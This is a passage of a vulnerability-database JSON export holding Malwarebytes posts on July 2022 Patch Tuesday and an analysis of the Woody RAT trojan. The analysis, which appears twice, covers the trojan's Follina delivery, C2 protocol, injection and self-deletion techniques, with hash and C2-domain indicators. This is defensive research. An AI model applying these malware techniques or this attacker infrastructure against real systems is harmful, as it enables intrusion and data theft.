"SMB_NT_MS22_JUL_5015877.NASL", "SMB_NT_MS22_JUL_RDC.NASL", "SMB_NT_MS22_JUN_5014678.NASL", "SMB_NT_MS22_JUN_5014692.NASL", "SMB_NT_MS22_JUN_5014697.NASL", "SMB_NT_MS22_JUN_5014699.NASL", "SMB_NT_MS22_JUN_5014702.NASL", "SMB_NT_MS22_JUN_5014710.NASL", "SMB_NT_MS22_JUN_5014741.NASL", "SMB_NT_MS22_JUN_5014742.NASL", "SMB_NT_MS22_JUN_5014743.NASL", "SMB_NT_MS22_JUN_5014746.NASL"]}, {"type": "osv", "idList": ["OSV:DSA-5180-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167317", "PACKETSTORM:167438"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:A63B251EBA1A69DBCD57674990704F6C", "QUALYSBLOG:BB3D6B2DDD8D4FA41B52503EF011FDA4"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:36C78C12B88BFE8FEF93D8EF7A7AA553", "RAPID7BLOG:509F3BE1FB927288AB4D3BD9A3090852", "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "RAPID7BLOG:B54637535A9D368B19D4D9881C6C34B3"]}, {"type": "schneier", "idList": ["SCHNEIER:FECDA04283F9CFE2D14C1550420A1804"]}, {"type": "securelist", "idList": ["SECURELIST:29152837444B2A7E5A9B9FCB107DAB36"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2022:10055-1", "OPENSUSE-SU-2022:10057-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:DE5281D9A4A03E4FA1F2A0B62B527489", "TALOSBLOG:F032D3BBC6D695272384D4A3821130BF"]}, {"type": "thn", "idList": ["THN:1EFEC00D867275514EA180819C9EF104", "THN:21FC29F7D7C7E2DA7D2F19E89085FD55", "THN:27F4624B58E2AB5E3EC8C74249CADF5C", "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "THN:35E0781FC3AEDCA2324C9B95396A5FF7", "THN:7A6D54BC76D090840197DDF871D59731", "THN:80C4CCCAB293DD273948D1317EAC8B73", "THN:8C2FBC83F6EC62900F1887F00903447F", "THN:A24E3ECC17FDA35932981ED1D0B9B351", "THN:B8CBCDA7152660D9AE3D4E058B7B9B0F", "THN:CD69EF060C75E2FF4DB33C7C492E75B1", "THN:D9A5562FBD56B3B0FF85376C9BCF0A10", "THN:DFA2CC41C78DFA4BED87B1410C21CE2A", "THN:DFB68B1B6C2EFBB410EB54D83320B71C"]}, {"type": "threatpost", "idList": ["THREATPOST:4365205CB12A4437E20A1077682B9CF8", "THREATPOST:44942C746E9FFDC2F783FA19F0AFD348", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:781705ADC10B0D40FC4B8D835FA5EA6D", "THREATPOST:91A97EE2BD6933FEB9A07162BD4ED8B5"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2022-2294", "UB:CVE-2022-2295"]}, {"type": "veracode", "idList": ["VERACODE:36371", "VERACODE:36373"]}, {"type": "zdt", "idList": ["1337DAY-ID-37779"]}]}, "epss": [{"cve": "CVE-2022-22029", "epss": "0.009940000", "percentile": "0.812600000", "modified": "2023-03-19"}, {"cve": "CVE-2022-22038", "epss": "0.004140000", "percentile": "0.699910000", "modified": "2023-03-19"}, {"cve": "CVE-2022-22039", "epss": "0.002750000", "percentile": "0.631310000", "modified": "2023-03-19"}, {"cve": "CVE-2022-22047", "epss": "0.000560000", "percentile": "0.214740000", "modified": "2023-03-19"}, {"cve": "CVE-2022-2294", "epss": "0.004260000", "percentile": "0.703480000", "modified": "2023-03-19"}, {"cve": "CVE-2022-2295", "epss": "0.001270000", "percentile": "0.457470000", "modified": "2023-03-19"}, {"cve": "CVE-2022-30190", "epss": "0.974350000", "percentile": "0.998820000", "modified": "2023-03-19"}, {"cve": "CVE-2022-30221", "epss": "0.049760000", "percentile": "0.915780000", "modified": "2023-03-19"}], "vulnersScore": 0.5}, "_state": {"score": 1698846685, "dependencies": 1659988328, "epss": 1679300891}, "_internal": {"score_hash": "b15e75d8c755c070c3bd8a95e11e85f4"}}

{"malwarebytes": [{"lastseen": "2022-07-16T16:17:19", "description": "It\u2019s time to triage a lot of [patching](<https://www.malwarebytes.com/business/vulnerability-patch-management>) again. Microsoft\u2019s July Patch Tuesday includes an actively exploited local privilege escalation vulnerability in the Windows Client/Server Runtime Subsystem (CSRSS). This vulnerability immediately made it to the Cybersecurity & Infrastructure Security Agency (CISA) list of [known to be exploited in the wild list](<https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/>) that are due for patching by August 2, 2022.\n\n## Microsoft\n\nIn total the Microsoft updates include fixes for 84 vulnerabilities. Four of these vulnerabilities are labelled as \u201cCritical\u201d since they are remote code execution (RCE) vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that ware assigned to the four Critical vulnerabilities:\n\n[CVE-2022-22029](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22029>): Windows Network File System (NFS) RCE vulnerability. This vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV3, but this may adversely affect your ecosystem and should only be used as a temporary mitigation.\n\n[CVE-2022-22039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22039>): Another Windows Network File System (NFS) RCE vulnerability. It's possible to exploit this vulnerability over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger an RCE.\n\n[CVE-2022-22038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22038>): Remote Procedure Call Runtime RCE vulnerability. Successful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[CVE-2022-30221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30221>): Windows Graphics Component RCE vulnerability. An attacker would have to convince a targeted user to connect to a malicious RDP server. On connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\n## Azure Site Recovery\n\nA huge part of the patches consist of 32 vulnerabilities in the Azure Site Recovery suite that could have allowed attackers to gain elevated privileges or perform remote code execution. [Azure Site Recovery](<https://docs.microsoft.com/en-us/azure/site-recovery/>) is an integrated disaster recovery service for Azure that helps ensure business continuity by keeping business apps and workloads running during outages.\n\nAccording to Microsoft, [SQL injection](<https://www.malwarebytes.com/glossary/sql-injection>) vulnerabilities caused most of the privilege escalation bugs in Azure Site Recovery.\n\n## CVE-2022-22047\n\nThe vulnerability that is known to be exploited in the wild is an elevation of privilege (EoP) vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.\n\nThis type of vulnerability usually comes into play once an attacker has gained an initial foothold. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.\n\nThe vulnerability is described as a Windows CSRSS Elevation of Privilege vulnerability. CSRSS is the Windows component that provides the user mode side of the Win32 subsystem. CSRSS is critical for a system\u2019s operation and is mainly responsible for Win32 console handling and GUI shutdown.\n\nThis type of vulnerability are often chained together with others in macros, which makes the decision to [roll back Office Macro blocking](<https://blog.malwarebytes.com/business/2022/07/microsoft-appears-to-be-rolling-back-office-macro-blocking/>) incomprehensible, even if it is only temporary.\n\n## Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.\n\nAdobe released [security updates](<https://helpx.adobe.com/security.html>) for Acrobat, Character Animator, Photoshop, Reader, and RoboHelp.\n\nCisco released critical updates for Cisco Expressway Series, Cisco TelePresence Video Communication Server, Cisco Email Security Appliance, Cisco Secure Email and Web Manager, Cisco Small Business RV110W, RV130, RV130W, and RV215W routers, and [several other security updates](<https://tools.cisco.com/security/center/publicationListing.x>).\n\nCitrix released [hotfixes](<https://support.citrix.com/article/CTX461397/citrix-hypervisor-security-bulletin-for-cve202223816-and-cve202223825>) to address a problem that may affect Citrix Hypervisor and Citrix XenServer under some circumstances.\n\nGoogle released [Android's July security updates](<https://source.android.com/security/bulletin/2022-07-01>) including 3 labelled as \u201cCritical\u201d.\n\nSAP released its [July 2022 Patch Day bulletin](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) with 20 new Security Notes.\n\nVMWare released [security updates](<https://www.vmware.com/security/advisories.html>).\n\nStay safe, everyone!\n\nThe post [Update now\u2014July Patch Tuesday patches include fix for exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-july-patch-tuesday-patches-include-fix-for-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-13T12:21:53", "type": "malwarebytes", "title": "Update now\u2014July Patch Tuesday patches include fix for exploited zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-30221"], "modified": "2022-07-13T12:21:53", "id": "MALWAREBYTES:90BD6A9BB937B6617FDC4FE73A86B38A", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-july-patch-tuesday-patches-include-fix-for-exploited-zero-day/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-08T14:51:13", "description": "_This blog post was authored by Ankur Saini and Hossein Jazi_\n\nThe Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.\n\nThis advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and more recently Office documents leveraging the Follina vulnerability.\n\nBased on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as [OAK](<https://en.wikipedia.org/wiki/United_Aircraft_Corporation>).\n\nIn this blog post, we will analyze Woody Rat's distribution methods, capabilities as well as communication protocol.\n\n## Distribution methods\n\nBased on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.\n\nThe earliest versions of this Rat was typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by [@MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1534184385313923072>).\n\nThe following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure1.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure1.png>) Woody Rat distribution methods\n\n**Archive files**\n\nIn this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:\n\n * _anketa_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa_Brozhik.doc.exe_.\n * _zayavka.zip_: It contains Woody Rat pretending to be an application (application for participation in the _selection.doc.exe_).\n\n**Follina vulnerability**\n\nThe threat actor is using a Microsoft Office document (_\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx_) that has weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The used lure is in Russian is called \"_Information security memo_\" which provide security practices for passwords, confidential information, etc.\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure2.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure2.png>) Document lure\n\n## Woody Rat Analysis\n\nThe threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat:\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure3-600x303.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure3.png>) Debug Information\n\nA lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as parameter.\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure4-600x142.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure4.png>) main function\n\nAs we will see later, that malware uses multiple threads and so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request.\n\n### Deriving the Cookie\n\nThe malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine specific values. The values are taken from the adapter information, computer name and volume information, and 8 random bytes are appended to this value to avoid any possible cookie collisions by the malware.\n\nA combination of _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions are used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure5.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure5.png>) get_cookie_data function\n\n### Data encryption with HTTP requests\n\nTo evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. The public key used for RSA-4096 is embedded inside the binary and the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.\n\nThe malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. Both the malware and C2 simultaneously use these bytes to generate the AES-CBC key using _BCryptGenerateSymmetricKey_ which is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure6.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure6.png>) RSA Encryption routine\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure7.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure7.png>) AES Encryption Routine\n\n### C2 HTTP endpoint request\n\n**knock** \\- This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request and the data of this request contains 32 random bytes which are used to derive AES-CBC key, while the 32 bytes are RSA-4096 encrypted.\n\nThe data received as response for this request is decrypted and it contains the url path to submit (/submit) the additional machine information which the malware generates after this operation.\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure8-600x352.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure8.png>) knock request headers\n\n**submit **\\- This endpoint request is used to submit information about the infected machine. The data sent to the C2 is AES-CBC encrypted. [Data](<https://gist.github.com/kernelm0de/fd018d58ebe78f603a13b2eba7f01917>) sent via submit API includes:\n\n * OS\n * Architecture\n * Antivirus installed\n * Computer Name\n * OS Build Version\n * .NET information\n * PowerShell information\n * Python information (Install path, version etc.)\n * Storage drives - includes Drive path, Internal name etc.\n * Environment Variables\n * Network Interfaces\n * Administrator privileges\n * List of running processes\n * Proxy information\n * Username\n * List of all the User accounts\n\nThe malware currently detects 6 AVs through Registry Keys; these AVs being Avast Software, Doctor Web, Kaspersky, AVG, ESET and Sophos.\n\n**ping** \\- The malware makes a ping GET http request to the C2 at regular intervals. If the C2 responds with \"_CRY\" then the malware proceeds to send the knock request again but if the C2 responds with \"_ACK\" the response contains additional information about which command should be executed by the malware.\n\nThe malware supports a wide variety of commands which are classified into _SET and _REQ requests as seen while analyzing the malware. We will dive into all these commands below in the blog.\n\n### C2 Commands\n\nThe malware uses a specific thread to communicate with the C2 and a different one to execute the commands received from the C2. To synchronize between both threads, the malware leverages events and mutex. To dispatch a command it modifies the state of the event linked to that object. We should note all the communications involved in these commands are AES encrypted.\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure9-600x117.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure9.png>) Command execution routine\n\n**_SET Commands**\n\n * **PING** \\- This command is used to set the sleep interval between every ping request to the C2.\n * **PURG** \\- Unknown command\n * **EXIT** \\- Exit the command execution thread.\n\n**_REQ Commands**\n\n * **EXEC** (Execute)- Executes the command received from the C2 by creating a cmd.exe process, the malware creates two named pipes and redirects the input and output to these pipes. The output of the command is read using _ReadFile_ from the named pipe and then \"_DAT\" is appended to this data before it is AES encrypted and sent to the C2.\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure10.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure10.png>) EXEC command\n\n * **UPLD** (Upload) - The Upload command is used to remotely upload a file to the infected machine. The malware makes a GET request to the C2 and receives data to be written as file.\n * **INFO** (Submit Information) - The INFO command is similar to the \"submit\" request above; this command sends the exact information to the C2 as sent by the \"submit\" request.\n\n![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure11.png) INFO command\n\n * **UPEX** (Upload and Execute) - This is a combination of UPLD and EXEC command. The commands first writes a file received from the C2 and then executes that file.\n * **DNLD** (Download) - The DNLD command allows the C2 to retrieve any file from the infected machine. The malware encrypts the requested file and sends the data via a POST request to the C2.\n * **PROC** (Execute Process) - The PROC command is similar to the EXEC command with slight differences, here the process is directly executed instead of executing it with cmd.exe as in EXEC command. The command uses the named pipes in similar fashion as used by the EXEC command.\n * **UPPR** (Upload and Execute Process) - This is a combination of UPLD and PROC command. The command receives the remote file using the upload command then executes the file using PROC command.\n * **SDEL** (Delete File) - This is used to delete any file on the infected system. It also seems to overwrite the first few bytes of the file to be deleted with random data.\n * **_DIR** (List directory) - This can list all the files and their attributes in a directory supplied as argument. If no directory is supplied, then it proceeds to list the current directory. File attributes retrieved by this command are: \n * Filename\n * Type (Directory, Unknown, File)\n * Owner\n * Creation time\n * Last access time\n * Last write time\n * Size\n * Permissions\n * **STCK** (Command Stack) - This allows the attacker to execute multiple commands with one request. The malware can receive a STCK command which can have multiple children commands which are executed in the same order they are received by the malware.\n * **SCRN** (Screenshot) - This command leverages Windows GDI+ to take the screenshot of the desktop. The image is then encrypted using AES-CBC and sent to the C2.\n * **INJC** (Process Injection) - The malware seems to generate a new AES key for this command. The code to be injected is received from the C2 and decrypted. To inject the code into the target process it writes it to the remote memory using WriteProcessMemory and then creates a remote thread using CreateRemoteThread.\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure12-600x88.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure12.png>) INJC routine\n\n * **PSLS** (Process List) - Calls _NtQuerySystemInformation_ with _SystemProcessInformation_ to retrieve an array containing all the running processes. Information sent about each process to the C2: \n * PID\n * ParentPID\n * Image Name\n * Owner\n * **DMON** (Creates Process) - The command seems similar to PROC with the only difference being the output of the process execution is not sent back to the C2. It receives the process name from the C2 and executes it using CreateProcess.\n * **UPDM** (Upload and Create Process) - Allows the C2 and upload a file and then execute it using DMON command.\n\n**SharpExecutor and PowerSession Commands**\n\nInterestingly, the malware has 2 .NET DLLs embedded inside. These DLLs are named _WoodySharpExecutor_ and _WoodyPowerSession_ respectively. _WoodySharpExecutor_ provides the malware ability to run .NET code received from the C2. _WoodyPowerSession_ on the other hand allows the malware to execute PowerShell commands and scripts received from the C2.\n\n_WoodyPowerSession_ makes use of pipelines to execute these PS commands. The .NET dlls are loaded by the malware and commands are executed via the methods present in these DLLs:\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure13-492x600.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure13.png>) SharpExecutor and PowerSession methods\n\nWe will look at the commands utilising these DLLs below:\n\n * **DN_B** (DotNet Binary) - This command makes use of the RunBinaryStdout method to execute Assembly code with arguments received from the C2. The code is received as an array of Base64 strings separated by 0x20 character.\n * **DN_D** (DotNet DLL) - This method provides the attacker a lot more control over the execution. An attacker can choose whether to send the console output back to the C2 or not. The method receives an array of Base64 strings consisting of code, class name, method name and arguments. The DLL loads the code and finds and executes the method based on other arguments received from the C2.\n * **PSSC** (PowerSession Shell Command) - Allows the malware to receive a Base64 encoded PowerShell command and execute it.\n * **PSSS** (PowerSession Shell Script) - This command allows the malware to load and execute a Base64 encoded PowerShell script received from the C2.\n * **PSSM** (PowerSession Shell Module) - This command receives an array of Base64 encoded strings, one of which contains the module contents and the other one contains the module name. These strings are decoded and this module is imported to the command pipeline and then invoked.\n\n### Malware Cleanup\n\nAfter creating the command threads, the malware deletes itself from disk. It uses the more commonly known _ProcessHollowing_ technique to do so. It creates a suspended notepad process and then writes shellcode to delete a file into the suspended process using _NtWriteVirtualMemory_. The entry point of the thread is set by using the _NtSetContextThread_ method and then the thread is resumed. This leads to the deletion of the malware from disk.\n\n[![](https://www.malwarebytes.com/blog/images/uploads/2022/08/figure14.png)](<https://www.malwarebytes.com/blog/images/uploads/2022/08/figure14.png>) Malware deletes itself\n\n## Unknown threat actor\n\nThis very capable Rat falls into the category of unknown threat actors we track. Historically, Chinese APTs such as Tonto team as well as North Korea with Konni have targeted Russia. However, based on what we were able to collect, there weren't any solid indicators to attribute this campaign to a specific threat actor.\n\nMalwarebytes blocks the Follina exploit that is being leveraged in the latest Woody Rat campaign. We also already detected the binary payloads via our heuristic malware engines.\n\n![](https://www.malwarebytes.com/blog/images/uploads/2022/08/block.png)\n\n## IOCs\n\n**Woody****Rat**:\n\n * 982ec24b5599373b65d7fec3b7b66e6afff4872847791cf3c5688f47bfcb8bf0\n * 66378c18e9da070629a2dbbf39e5277e539e043b2b912cc3fed0209c48215d0b\n * b65bc098b475996eaabbb02bb5fee19a18c6ff2eee0062353aff696356e73b7a\n * 43b15071268f757027cf27dd94675fdd8e771cdcd77df6d2530cb8e218acc2ce\n * 408f314b0a76a0d41c99db0cb957d10ea8367700c757b0160ea925d6d7b5dd8e\n * 0588c52582aad248cf0c43aa44a33980e3485f0621dba30445d8da45bba4f834\n * 5c5020ee0f7a5b78a6da74a3f58710cba62f727959f8ece795b0f47828e33e80\n * 3ba32825177d7c2aac957ff1fc5e78b64279aeb748790bc90634e792541de8d3\n * 9bc071fb6a1d9e72c50aec88b4317c3eb7c0f5ff5906b00aa00d9e720cbc828d\n\n**C2s:**\n\n * kurmakata.duckdns[.]org\n * microsoft-ru-data[.]ru\n * 194.36.189.179\n * microsoft-telemetry[.]ru\n * oakrussia[.]ru\n\n**Follina Doc:** \n\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx \nffa22c40ac69750b229654c54919a480b33bc41f68c128f5e3b5967d442728fb \n**Follina html file:** \ngarmandesar.duckdns[.]org:444/uoqiuwef.html \n**Woody Rat url:** \nfcloud.nciinform[.]ru/main.css (edited)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-03T21:00:00", "type": "malwarebytes", "title": "Woody RAT: A new feature-rich malware spotted in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-03T21:00:00", "id": "MALWAREBYTES:A92CA3CF06DBCD086A388A462B770E3B", "href": "https://www.malwarebytes.com/blog/news/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T15:17:43", "description": "_This blog post was authored by Ankur Saini and Hossein Jazi_\n\nThe Malwarebytes Threat Intelligence team has identified a new Remote Access Trojan we are calling Woody Rat that has been in the wild for at least one year.\n\nThis advanced custom Rat is mainly the work of a threat actor that targets Russian entities by using lures in archive file format and more recently Office documents leveraging the Follina vulnerability.\n\nBased on a fake domain registered by the threat actors, we know that they tried to target a Russian aerospace and defense entity known as [OAK](<https://en.wikipedia.org/wiki/United_Aircraft_Corporation>).\n\nIn this blog post, we will analyze Woody Rat's distribution methods, capabilities as well as communication protocol.\n\n## Distribution methods \n\nBased on our knowledge, Woody Rat has been distributed using two different formats: archive files and Office documents using the Follina vulnerability.\n\nThe earliest versions of this Rat was typically archived into a zip file pretending to be a document specific to a Russian group. When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload, as identified by [@MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1534184385313923072>).\n\nThe following diagram shows the overall attack flow used by the threat actor to drop Woody Rat:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure1.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure1.png> \"\" )Woody Rat distribution methods\n\n**Archive files**\n\nIn this method, Woody Rat is packaged into an archive file and sent to victims. We believe that these archive files have been distributed using spear phishing emails. Here are some examples of these archive files:\n\n * _anketa_brozhik.doc.zip_: It contains Woody Rat with the same name: _Anketa_Brozhik.doc.exe_.\n * _zayavka.zip_: It contains Woody Rat pretending to be an application (application for participation in the _selection.doc.exe_).\n\n**Follina vulnerability**\n\nThe threat actor is using a Microsoft Office document (_\u041f\u0430\u043c\u044f\u0442\u043a\u0430.docx_) that has weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. The used lure is in Russian is called "_Information security memo_" which provide security practices for passwords, confidential information, etc. \n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure2.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure2.png> \"\" )Document lure\n\n## Woody Rat Analysis\n\nThe threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat:\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure3-600x303.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure3.png> \"\" )Debug Information\n\nA lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. Before initialization, the malware effectively suppresses all error reporting by calling SetErrorMode with 0x8007 as parameter.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure4-600x142.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure4.png> \"\" )main function\n\nAs we will see later, that malware uses multiple threads and so it allocates a global object and assigns a mutex to it to make sure no two clashing operations can take place at the same time. This object enforces that only one thread is reaching out to the C2 at a given time and that there are no pending requests before making another request. \n\n### Deriving the Cookie\n\nThe malware communicates with its C2 using HTTP requests. To uniquely identify each infected machine, the malware derives a cookie from machine specific values. The values are taken from the adapter information, computer name and volume information, and 8 random bytes are appended to this value to avoid any possible cookie collisions by the malware.\n\nA combination of _GetAdaptersInfo_, _GetComputerNameA_ and _GetVolumeInformationW_ functions are used to retrieve the required data to generate the cookie. This cookie is sent with every HTTP request that is made to the C2.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure5.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure5.png> \"\" )get_cookie_data function\n\n### Data encryption with HTTP requests\n\nTo evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. The public key used for RSA-4096 is embedded inside the binary and the malware formulates the RSA public key blob at runtime using the embedded data and imports it using the _BCryptImportKeyPair_ function.\n\nThe malware derives the key for AES-CBC at runtime by generating 32 random bytes; these 32 bytes are then encrypted with RSA-4096 and sent to the C2. Both the malware and C2 simultaneously use these bytes to generate the AES-CBC key using _BCryptGenerateSymmetricKey_ which is used in subsequent HTTP requests to encrypt and decrypt the data. For encryption and decryption the malware uses _BCryptEncrypt_ and _BCryptDecrypt_ respectively.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure6.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure6.png> \"\" )RSA Encryption routine\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure7.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure7.png> \"\" )AES Encryption Routine\n\n### C2 HTTP endpoint request\n\n**knock** - This is the first HTTP request that the malware makes to the C2. The machine-specific cookie is sent as part of the headers here. This is a POST request and the data of this request contains 32 random bytes which are used to derive AES-CBC key, while the 32 bytes are RSA-4096 encrypted.\n\nThe data received as response for this request is decrypted and it contains the url path to submit (/submit) the additional machine information which the malware generates after this operation.\n\n[![](https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure8-600x352.png)](<https://blog.malwarebytes.com/wp-content/uploads/2022/08/figure8.png> \"\" 